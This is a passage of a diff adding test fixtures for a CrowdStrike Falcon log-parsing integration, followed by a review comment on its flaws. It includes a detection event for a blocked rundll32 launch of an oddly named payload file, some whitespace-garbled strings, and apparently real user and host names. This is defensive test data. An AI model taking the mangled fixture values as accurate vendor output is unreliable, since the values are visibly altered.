e,"BlockingUnsupportedOrDisabled":false,"SuspendProcess":false,"SuspendParent":false},"ParentImageFileName":"\\Device\\HarddiskVolume4\\Windows\\explorer.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","GrandparentImageFileName":"\\Device\\HarddiskVolume4\\Windows\\System32\\userinit.exe","GrandparentCommandLine":"C:\\Windows\\system32\\userinit.exe","HostGroups":"e2091491a28248eaae3ede9f217e03fc,e837d750b8ba400c953380da346e2b04,186c20383a98495cb0e0a7d5540f3aff,24d1f760fcdc46d992bb8f41d7dd897b,2b7bd0fede874baaa1afdea20f255632,a293aded9c4548469d0e853b7267cce5,adab9db4541040729e01d16211189a27,b75b27ce17244922bd0a862a712ea812","Tags":"SensorGroupingTags/USB_Storage_Exception","AssociatedFile":"\\Device\\HarddiskVolume4\\Windows\\System32\\rundll32.exe","PatternId":10186}}
+{"metadata":{"customerIDString":"abcabcabc22222","offset":8698239,"eventType":"IncidentSummaryEvent","eventCreationTime":1698971797000,"version":"1.0"},"event":{"IncidentStartTime":1698971797,"IncidentEndTime":1698971797,"FalconHostLink":"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e?_cid=ggggffffhhhhjjjjj","State":"open","FineScore":6.1,"LateralMovement":0,"IncidentType":1,"IncidentID":"inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e","HostID":"4345454534534545"}}
\ No newline at end of file
diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log-expected.json
new file mode 100644
index 00000000000..9bf6eef6340
--- /dev/null
+++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log-expected.json
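Review bot: Several string values in these sample events have had their spaces stripped (`DetectDescription`, `PatternDispositionDescription`, `IncidentType`, `IncidentDescription`, the `message` audit value) while others keep them (`"Unusual login to an endpoint"`, `"Gain Access"`), which looks like a whitespace-stripping step in the anonymization rather than the vendor's real formatting. The most consequential case is the DetectionSummaryEvent `CommandLine`, where the separator between the executable and its argument is gone, so the expected output later in this diff appears to carry `process.args` as a single element and the args-splitting path is never exercised by this fixture. Suggest restoring the separator, e.g. `"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" \\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh"` (a constructed value), and regenerating the expected file. The user and host identifiers (`vishnu.sharma`, `INNOIDL0032`, `UKCHUDL00206`) also read as real rather than synthetic; replacing them with obviously fabricated values would match the rest of the fixture.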
@@ -0,0 +1,774 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-02T10:39:31.000Z", + "crowdstrike": { + "event": { + "CustomerId": "abcabcabc22222", + "DeviceId": "6734ff444f4456", + "Flags": { + "Audit": false, + "Log": true, + "Monitor": true + }, + "MatchCount": 1, + "MatchCountSinceLastReport": 1, + "NetworkProfile": "2", + "PolicyID": "3ec266b28bef471f9fd990e4f39ac829", + "PolicyName": "PROD-FW-Workstations-Office-20201001", + "Protocol": "6", + "RuleAction": "2", + "Timestamp": "2023-11-02T10:39:29Z" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "FirewallMatchEvent", + "offset": 8693900, + "version": "1.0" + } + }, + "destination": { + "ip": "81.2.69.142", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "firewall_match_event" + ], + "category": [ + "network" + ], + "code": "FirewallRuleIP4Matched", + "created": "2023-11-02T10:39:31.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8693900,\"eventType\":\"FirewallMatchEvent\",\"eventCreationTime\":1698921571000,\"version\":\"1.0\"},\"event\":{\"DeviceId\":\"6734ff444f4456\",\"CustomerId\":\"abcabcabc22222\",\"Ipv\":\"ipv4\",\"CommandLine\":\"System\",\"ConnectionDirection\":\"1\",\"EventType\":\"FirewallRuleIP4Matched\",\"Flags\":{\"Audit\":false,\"Log\":true,\"Monitor\":true},\"HostName\":\"INPUNEDITCLP229\",\"ICMPCode\":\"\",\"ICMPType\":\"\",\"ImageFileName\":\"System\",\"LocalAddress\":\"81.2.69.142\",\"LocalPort\":\"445\",\"MatchCount\":1,\"MatchCountSinceLastReport\":1,\"NetworkProfile\":\"2\",\"PID\":\"11111111\",\"PolicyName\":\"PROD-FW-Workstations-Office-20201001\",\"PolicyID\":\"3ec266b28bef471f9fd990e4f39ac829\",\"Protocol\":\"6\",\"RemoteAddress\":\"81.2.69.142\",\"RemotePort\":\"53452\",\"RuleAction\":\"2\",\"RuleDescription\":\"\",\"RuleFamilyID\":\"11111111aaaaaaaa\",\"RuleGroupName\":\"SMBRules\",\"RuleName\":\"InboundSMBBlock\\u0026LogPrivate\",\"RuleId\":\"48771726387
43447345\",\"Status\":\"\",\"Timestamp\":\"2023-11-02T10:39:29Z\",\"TreeID\":\"\",\"Platform\":\"windows\"}}", + "type": [ + "start", + "connection", + "denied" + ] + }, + "host": { + "name": "INPUNEDITCLP229", + "os": { + "platform": "windows" + } + }, + "message": "Firewall Rule: 'InboundSMBBlock&LogPrivate' triggered - Action: 'Blocked'", + "network": { + "direction": "ingress", + "type": "ipv4" + }, + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "process": { + "args": [ + "System" + ], + "command_line": "System", + "executable": "System", + "pid": 11111111 + }, + "related": { + "hosts": [ + "INPUNEDITCLP229" + ], + "ip": [ + "81.2.69.142" + ] + }, + "rule": { + "category": "11111111aaaaaaaa", + "id": "4877172638743447345", + "name": "InboundSMBBlock&LogPrivate", + "ruleset": "SMBRules" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.142", + "port": 53452 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2023-11-02T10:40:07.000Z", + "crowdstrike": { + "event": { + "ActivityId": "76CC8396-7148-4CEB-84CB-08FAFE4FAC37", + "DataDomains": "Identity", + "Objective": "Gain Access", + "PatternId": "51135", + "SeverityName": "Low", + "SourceAccountUpn": "admin.service@example.com", + "SourceEndpointAccountObjectGuid": "C078A5DA-E13B-4418-AA28-802EF8C16210", + "SourceEndpointAccountObjectSid": "S-1-S-1-S-1-1111-1844237615-1801674531-316681", + "SourceEndpointSensorId": "a2f1de586958434eb5e14e30214e17ed", + "SourceProducts": "FalconIdentityProtection", + "SourceVendors": "CrowdStrike" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "IdpDetectionSummaryEvent", + "offset": 8693906, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + 
"action": "ipd-detection", + "category": [ + "malware" + ], + "created": "2023-11-02T10:38:58.000Z", + "end": "2023-11-02T10:36:00.000Z", + "kind": "alert", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8693906,\"eventType\":\"IdpDetectionSummaryEvent\",\"eventCreationTime\":1698921607000,\"version\":\"1.0\"},\"event\":{\"ContextTimeStamp\":133433951380000000,\"DetectId\":\"abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222\",\"DetectName\":\"Unusual login to an endpoint\",\"DetectDescription\":\"A user logged into a machine for the first time\",\"FalconHostLink\":\"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222?_cid=abcabcabc22222\",\"StartTime\":133433949600000000,\"EndTime\":133433949600000000,\"Severity\":34,\"SeverityName\":\"Low\",\"Tactic\":\"InitialAccess\",\"Technique\":\"ValidAccounts\",\"Objective\":\"Gain Access\",\"SourceAccountDomain\":\"NA.AAA.ABC.com\",\"SourceAccountName\":\"abc.service\",\"SourceAccountUpn\":\"admin.service@example.com\",\"SourceAccountObjectSid\":\"S-1-S-1-S-1-1111-1844237615-1801674531-175881\",\"SourceEndpointAccountObjectGuid\":\"C078A5DA-E13B-4418-AA28-802EF8C16210\",\"SourceEndpointAccountObjectSid\":\"S-1-S-1-S-1-1111-1844237615-1801674531-316681\",\"SourceEndpointHostName\":\"nope122.na.net.ABC.com\",\"SourceEndpointIpAddress\":\"81.2.69.142\",\"SourceEndpointSensorId\":\"a2f1de586958434eb5e14e30214e17ed\",\"ActivityId\":\"76CC8396-7148-4CEB-84CB-08FAFE4FAC37\",\"PatternId\":51135,\"SourceVendors\":\"CrowdStrike\",\"SourceProducts\":\"FalconIdentityProtection\",\"DataDomains\":\"Identity\"}}", + "reference": "https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222?_cid=abcabcabc22222", + "severity": 34, + "start": "2023-11-02T10:36:00.000Z", + "type": [ + "info" + ] + }, + "host": { + "ip": "81.2.69.142", + "name": 
"nope122.na.net.ABC.com" + }, + "message": "A user logged into a machine for the first time", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "hosts": [ + "nope122.na.net.ABC.com" + ], + "user": [ + "abc.service" + ] + }, + "rule": { + "description": "A user logged into a machine for the first time", + "id": "abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222", + "name": "Unusual login to an endpoint", + "uuid": "51135" + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "tactic": { + "name": [ + "InitialAccess" + ] + }, + "technique": { + "name": [ + "ValidAccounts" + ] + } + }, + "user": { + "domain": "NA.AAA.ABC.com", + "id": "S-1-S-1-S-1-1111-1844237615-1801674531-175881", + "name": "abc.service" + } + }, + { + "@timestamp": "2023-11-02T11:09:00.000Z", + "crowdstrike": { + "event": { + "Category": "Detections", + "NumberOfCompromisedEntities": 2, + "NumbersOfAlerts": 1, + "SeverityName": "LOW", + "State": "NEW" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "IdentityProtectionEvent", + "offset": 8694126, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Unusuallogintoanendpoint", + "category": [ + "iam" + ], + "created": "2023-11-02T11:12:03.065Z", + "id": "7a79b2de-4e10-41fb-818f-2bdf53c1625a", + "kind": "event", + "original": 
"{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694126,\"eventType\":\"IdentityProtectionEvent\",\"eventCreationTime\":1698923523065,\"version\":\"1.0\"},\"event\":{\"IncidentType\":\"Unusuallogintoanendpoint\",\"IncidentDescription\":\"Unusuallogintoanendpoint\",\"Severity\":4,\"SeverityName\":\"LOW\",\"StartTime\":1698923340000,\"EndTime\":1698923340000,\"IdentityProtectionIncidentId\":\"7a79b2de-4e10-41fb-818f-2bdf53c1625a\",\"UserName\":\"NA.NET.ABC.com\\\\abc.service\",\"EndpointName\":\"itreg1d3wp8vh3.eu.net.ABC.com\",\"EndpointIp\":\"\",\"Category\":\"Detections\",\"NumbersOfAlerts\":1,\"NumberOfCompromisedEntities\":2,\"State\":\"NEW\",\"FalconHostLink\":\"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:7A79B2DE-4E10-41FB-818F-2BDF53C1625A\"}}", + "reference": "https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:7A79B2DE-4E10-41FB-818F-2BDF53C1625A", + "severity": 4, + "start": "2023-11-02T11:09:00.000Z", + "type": [ + "info" + ] + }, + "host": { + "hostname": "itreg1d3wp8vh3.eu.net.ABC.com" + }, + "message": "Unusuallogintoanendpoint", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "user": [ + "abc.service" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "NA.NET.ABC.com", + "name": "abc.service" + } + }, + { + "@timestamp": "2023-11-02T12:21:39.000Z", + "crowdstrike": { + "event": { + "Attributes": { + "actor_cid": "abcabcabc22222", + "actor_user": "admin.rose@example.com", + "actor_user_uuid": "00000000-aaaa-480b-a05a-bb94ff5dc0fb", + "app_id": "aaaaaaaa-2e60-4837-b987-c57020947cd6", + "saml_assertion": "saml_assertion_sample", + "target_user": "admin.rose@example.com", + "trace_id": "000000-76c5-4861-92f1-355d0a908f40" + }, + "AuditKeyValues": [ + { + "Key": "target_user", + "ValueString": "admin.rose@example.com" + }, + { + "Key": "trace_id", + "ValueString": 
"19169200-76c5-4861-92f1-355d0a908f40" + }, + { + "Key": "saml_envelope", + "ValueString": "SampleValue" + }, + { + "Key": "saml_assertion", + "ValueString": "sampleassertion" + }, + { + "Key": "app_id", + "ValueString": "fa8e047e-2e60-4837-b987-c57020947cd6" + }, + { + "Key": "actor_user", + "ValueString": "admin.rose@example.com" + }, + { + "Key": "actor_user_uuid", + "ValueString": "8940ddf0-bc3c-480b-a05a-bb94ff5dc0fb" + }, + { + "Key": "actor_cid", + "ValueString": "abcabcabc22222" + } + ], + "OperationName": "saml2Assert", + "Success": true + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "AuthActivityAuditEvent", + "offset": 8694676, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "saml2Assert" + ], + "category": [ + "iam" + ], + "created": "2023-11-02T12:21:39.286Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694676,\"eventType\":\"AuthActivityAuditEvent\",\"eventCreationTime\":1698927699286,\"version\":\"1.0\"},\"event\":{\"UserId\":\"admin.rose@example.com\",\"UserIp\":\"81.2.69.144\",\"OperationName\":\"saml2Assert\",\"ServiceName\":\"CrowdstrikeAuthentication\",\"Success\":true,\"UTCTimestamp\":1698927699,\"AuditKeyValues\":[{\"Key\":\"target_user\",\"ValueString\":\"admin.rose@example.com\"},{\"Key\":\"trace_id\",\"ValueString\":\"19169200-76c5-4861-92f1-355d0a908f40\"},{\"Key\":\"saml_envelope\",\"ValueString\":\"SampleValue\"},{\"Key\":\"saml_assertion\",\"ValueString\":\"sampleassertion\"},{\"Key\":\"app_id\",\"ValueString\":\"fa8e047e-2e60-4837-b987-c57020947cd6\"},{\"Key\":\"actor_user\",\"ValueString\":\"admin.rose@example.com\"},{\"Key\":\"actor_user_uuid\",\"ValueString\":\"8940ddf0-bc3c-480b-a05a-bb94ff5dc0fb\"},{\"Key\":\"actor_cid\",\"ValueString\":\"abcabcabc22222\"}],\"Attributes\":{\"actor_cid\":\"abcabcabc22222\",\"actor_user\":\"admin.rose@example.com\",\"actor_user_uuid\":\"00000000-aaaa-480b-a05a-bb94ff5dc
0fb\",\"app_id\":\"aaaaaaaa-2e60-4837-b987-c57020947cd6\",\"saml_assertion\":\"saml_assertion_sample\",\"target_user\":\"admin.rose@example.com\",\"trace_id\":\"000000-76c5-4861-92f1-355d0a908f40\"}}}", + "outcome": "success" + }, + "message": "CrowdstrikeAuthentication", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "admin.rose@example.com" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "admin.rose@example.com", + "name": "admin.rose@example.com" + } + }, + { + "@timestamp": "2023-11-02T12:28:47.000Z", + "crowdstrike": { + "event": { + "Attributes": { + "device_id": "afjafanfafasfjaf", + "message": "Removeduplicatesensor.", + "seedID": "101" + }, + "AuditKeyValues": [ + { + "Key": "device_id", + "ValueString": "abcancancbanjjagjaj" + }, + { + "Key": "seedID", + "ValueString": "101" + }, + { + "Key": "message", + "ValueString": "Removeduplicatesensor." 
+ } + ], + "ServiceName": "sensor_update_policy" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "UserActivityAuditEvent", + "offset": 8694733, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "user_activity_audit_event", + "category": [ + "iam" + ], + "created": "2023-11-02T12:28:47.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694733,\"eventType\":\"UserActivityAuditEvent\",\"eventCreationTime\":1698928127000,\"version\":\"1.0\"},\"event\":{\"UserId\":\"admin.rose@example.com\",\"UserIp\":\"81.2.69.144\",\"OperationName\":\"reveal_token\",\"ServiceName\":\"sensor_update_policy\",\"AuditKeyValues\":[{\"Key\":\"device_id\",\"ValueString\":\"abcancancbanjjagjaj\"},{\"Key\":\"seedID\",\"ValueString\":\"101\"},{\"Key\":\"message\",\"ValueString\":\"Removeduplicatesensor.\"}],\"UTCTimestamp\":1698928127,\"Attributes\":{\"device_id\":\"afjafanfafasfjaf\",\"message\":\"Removeduplicatesensor.\",\"seedID\":\"101\"}}}", + "type": [ + "change" + ] + }, + "message": "reveal_token", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "admin.rose@example.com" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "admin.rose@example.com", + "name": "admin.rose@example.com" + } + }, + { + "@timestamp": "2023-11-02T13:00:00.000Z", + "crowdstrike": { + "event": { + "ExecutionID": "efghtigh", + "ExecutionMetadata": { + "ExecutionDuration": 152176, + "ExecutionStart": 1698930019000, + "ReportFileName": "Laroux_Search_2023_November_2_13017_34176.csv", + "ResultCount": 0, 
+ "ResultID": "fffffzdlIiwiY3VzdG9tZXJfYXBwIjoiZWFtIiwic2lnbmF0dXJlX3BvcnRpb24iOiIzYWRhOTZiNDA4MTkxNTFhZmIxYjFkOTM2MWZhMmE1NjBmNGNkMzc0ODQxNTY4MDlkYzhmNDRkMmRkZDY1NzdlIn0=", + "SearchWindowEnd": 1698930000000, + "SearchWindowStart": 1698843600000 + }, + "ReportFileReference": "/reports/entities/report-executions-download/v1?ids=eeeeeeeeeerrrrr444444", + "ReportID": "999999ddddddddd", + "ReportName": "LarouxSearch", + "ReportType": "event_search", + "Status": "1", + "StatusMessage": "message", + "UserUUID": "9999999-bc3c-99bb-a05a-bb94ff5dc0fb" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "ScheduledReportNotificationEvent", + "offset": 8694992, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2023-11-02T13:02:52.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694992,\"eventType\":\"ScheduledReportNotificationEvent\",\"eventCreationTime\":1698930172000,\"version\":\"1.0\"},\"event\":{\"UserUUID\":\"9999999-bc3c-99bb-a05a-bb94ff5dc0fb\",\"UserID\":\"admin.rose@example.com\",\"ExecutionID\":\"efghtigh\",\"ReportID\":\"999999ddddddddd\",\"ReportName\":\"LarouxSearch\",\"ReportType\":\"event_search\",\"ReportFileReference\":\"/reports/entities/report-executions-download/v1?ids=eeeeeeeeeerrrrr444444\",\"Status\":1,\"StatusMessage\":\"message\",\"ExecutionMetadata\":{\"ExecutionStart\":1698930019000,\"ExecutionDuration\":152176,\"ReportFileName\":\"Laroux_Search_2023_November_2_13017_34176.csv\",\"ResultCount\":0,\"ResultID\":\"fffffzdlIiwiY3VzdG9tZXJfYXBwIjoiZWFtIiwic2lnbmF0dXJlX3BvcnRpb24iOiIzYWRhOTZiNDA4MTkxNTFhZmIxYjFkOTM2MWZhMmE1NjBmNGNkMzc0ODQxNTY4MDlkYzhmNDRkMmRkZDY1NzdlIn0=\",\"SearchWindowStart\":1698843600000,\"SearchWindowEnd\":1698930000000}}}" + }, + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "user": [ + "admin.rose" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + 
"domain": "example.com", + "id": "admin.rose@example.com", + "name": "admin.rose" + } + }, + { + "@timestamp": "2023-11-02T13:41:34.000Z", + "crowdstrike": { + "event": { + "AgentIdString": "fffffffff33333", + "SessionId": "1111-fffff-4bb4-99c1-74c13cfc3e5a" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "RemoteResponseSessionStartEvent", + "offset": 8695284, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "remote_response_session_start_event" + ], + "category": [ + "network", + "session" + ], + "created": "2023-11-02T13:41:34.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8695284,\"eventType\":\"RemoteResponseSessionStartEvent\",\"eventCreationTime\":1698932494000,\"version\":\"1.0\"},\"event\":{\"SessionId\":\"1111-fffff-4bb4-99c1-74c13cfc3e5a\",\"HostnameField\":\"UKCHUDL00206\",\"UserName\":\"admin.rose@example.com\",\"StartTimestamp\":1698932494,\"AgentIdString\":\"fffffffff33333\"}}", + "start": "2023-11-02T13:41:34.000Z", + "type": [ + "start" + ] + }, + "host": { + "name": "UKCHUDL00206" + }, + "message": "Remote response session started.", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "hosts": [ + "UKCHUDL00206" + ], + "user": [ + "admin.rose@example.com" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "admin.rose@example.com", + "name": "admin.rose@example.com" + } + }, + { + "@timestamp": "2023-11-02T13:43:35.000Z", + "crowdstrike": { + "event": { + "AssociatedFile": "\\Device\\HarddiskVolume4\\Windows\\System32\\rundll32.exe", + "GrandparentCommandLine": "C:\\Windows\\system32\\userinit.exe", + "GrandparentImageFileName": "\\Device\\HarddiskVolume4\\Windows\\System32\\userinit.exe", + "HostGroups": [ + "e2091491a28248eaae3ede9f217e03fc", + "e837d750b8ba400c953380da346e2b04", + "186c20383a98495cb0e0a7d5540f3aff", + "24d1f760fcdc46d992bb8f41d7dd897b", + 
"2b7bd0fede874baaa1afdea20f255632", + "a293aded9c4548469d0e853b7267cce5", + "adab9db4541040729e01d16211189a27", + "b75b27ce17244922bd0a862a712ea812" + ], + "IOCType": "hash_sha256", + "IOCValue": "d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e", + "MACAddress": "02-50-41-00-00-01", + "Objective": "KeepAccess", + "ParentImageFileName": "\\Device\\HarddiskVolume4\\Windows\\explorer.exe", + "PatternDispositionFlags": { + "BlockingUnsupportedOrDisabled": false, + "BootupSafeguardEnabled": false, + "CriticalProcessDisabled": false, + "Detect": false, + "FsOperationBlocked": false, + "HandleOperationDowngraded": false, + "InddetMask": false, + "Indicator": false, + "KillActionFailed": false, + "KillParent": false, + "KillProcess": false, + "KillSubProcess": false, + "OperationBlocked": false, + "PolicyDisabled": false, + "ProcessBlocked": true, + "QuarantineFile": false, + "QuarantineMachine": false, + "RegistryOperationBlocked": false, + "Rooting": false, + "SensorOnly": false, + "SuspendParent": false, + "SuspendProcess": false + }, + "PatternDispositionValue": 2048, + "PatternId": "10186", + "SensorId": "69027ffffffffffffaaf50", + "SeverityName": "High" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "DetectionSummaryEvent", + "offset": 8695332, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Prevention,processwasblockedfromexecution.", + "category": [ + "malware" + ], + "created": "2023-11-02T13:43:35.000Z", + "kind": "alert", + "original": 
"{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8695332,\"eventType\":\"DetectionSummaryEvent\",\"eventCreationTime\":1698932615000,\"version\":\"1.0\"},\"event\":{\"ProcessStartTime\":1698932614,\"ProcessEndTime\":1698932614,\"ProcessId\":54665651,\"ParentProcessId\":540396081,\"ComputerName\":\"INNOIDL0032\",\"UserName\":\"vishnu.sharma\",\"DetectName\":\"AttackerMethodology\",\"DetectDescription\":\"Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.\",\"Severity\":4,\"SeverityName\":\"High\",\"FileName\":\"rundll32.exe\",\"FilePath\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\System32\",\"CommandLine\":\"\\\"C:\\\\Windows\\\\System32\\\\rundll32.exe\\\"\\\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh\",\"SHA256String\":\"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e\",\"MD5String\":\"a52bfa4a96f97c368312028dbd7c8461\",\"SHA1String\":\"0000000000000000000000000000000000000000\",\"MachineDomain\":\"AP\",\"FalconHostLink\":\"https://falcon.crowdstrike.com/activity/detections/detail/6902738b2a374a718cd9a45085baaf50/2246270721205?_cid=gffffffffy3zjobdz7ewb4xjqyjsy5a\",\"SensorId\":\"69027ffffffffffffaaf50\",\"IOCType\":\"hash_sha256\",\"IOCValue\":\"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e\",\"DetectId\":\"ldt:690ddddddd0721205\",\"LocalIP\":\"81.2.69.144\",\"MACAddress\":\"02-50-41-00-00-01\",\"Tactic\":\"DefenseEvasion\",\"Technique\":\"Rundll32\",\"Objective\":\"KeepAccess\",\"PatternDispositionDescription\":\"Prevention,processwasblockedfromexecution.\",\"PatternDispositionValue\":2048,\"PatternDispositionFlags\":{\"Indicator\":false,\"Detect\":false,\"InddetMask\":false,\"SensorOnly\":false,\"Rooting\":false,\"KillProcess\":false,\"KillSubProcess\":false,\"QuarantineMachine\":false,\"QuarantineFile\":false,\"PolicyDisabled\":false,\"KillParent\":false,\"OperationBlocked\":false,\"Proc
essBlocked\":true,\"RegistryOperationBlocked\":false,\"CriticalProcessDisabled\":false,\"BootupSafeguardEnabled\":false,\"FsOperationBlocked\":false,\"HandleOperationDowngraded\":false,\"KillActionFailed\":false,\"BlockingUnsupportedOrDisabled\":false,\"SuspendProcess\":false,\"SuspendParent\":false},\"ParentImageFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\explorer.exe\",\"ParentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\",\"GrandparentImageFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\System32\\\\userinit.exe\",\"GrandparentCommandLine\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"HostGroups\":\"e2091491a28248eaae3ede9f217e03fc,e837d750b8ba400c953380da346e2b04,186c20383a98495cb0e0a7d5540f3aff,24d1f760fcdc46d992bb8f41d7dd897b,2b7bd0fede874baaa1afdea20f255632,a293aded9c4548469d0e853b7267cce5,adab9db4541040729e01d16211189a27,b75b27ce17244922bd0a862a712ea812\",\"Tags\":\"SensorGroupingTags/USB_Storage_Exception\",\"AssociatedFile\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\System32\\\\rundll32.exe\",\"PatternId\":10186}}", + "reference": "https://falcon.crowdstrike.com/activity/detections/detail/6902738b2a374a718cd9a45085baaf50/2246270721205?_cid=gffffffffy3zjobdz7ewb4xjqyjsy5a", + "severity": 4, + "type": [ + "info" + ] + }, + "file": { + "hash": { + "md5": "a52bfa4a96f97c368312028dbd7c8461", + "sha1": "0000000000000000000000000000000000000000", + "sha256": "d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e" + }, + "path": "\\Device\\HarddiskVolume4\\Windows\\System32" + }, + "host": { + "domain": "AP", + "name": "INNOIDL0032" + }, + "message": "Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "process": { + "args": [ + "\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh" + ], + "command_line": 
"\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh", + "end": "2023-11-02T13:43:34.000Z", + "executable": "\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh", + "name": "rundll32.exe", + "parent": { + "args": [ + "C:\\Windows\\Explorer.EXE" + ], + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\Explorer.EXE", + "pid": 540396081 + }, + "pid": 54665651, + "start": "2023-11-02T13:43:34.000Z" + }, + "related": { + "hash": [ + "0000000000000000000000000000000000000000", + "d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e", + "a52bfa4a96f97c368312028dbd7c8461" + ], + "hosts": [ + "INNOIDL0032" + ], + "ip": [ + "81.2.69.144" + ], + "user": [ + "vishnu.sharma" + ] + }, + "rule": { + "description": "Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.", + "id": "ldt:690ddddddd0721205", + "name": "AttackerMethodology" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": 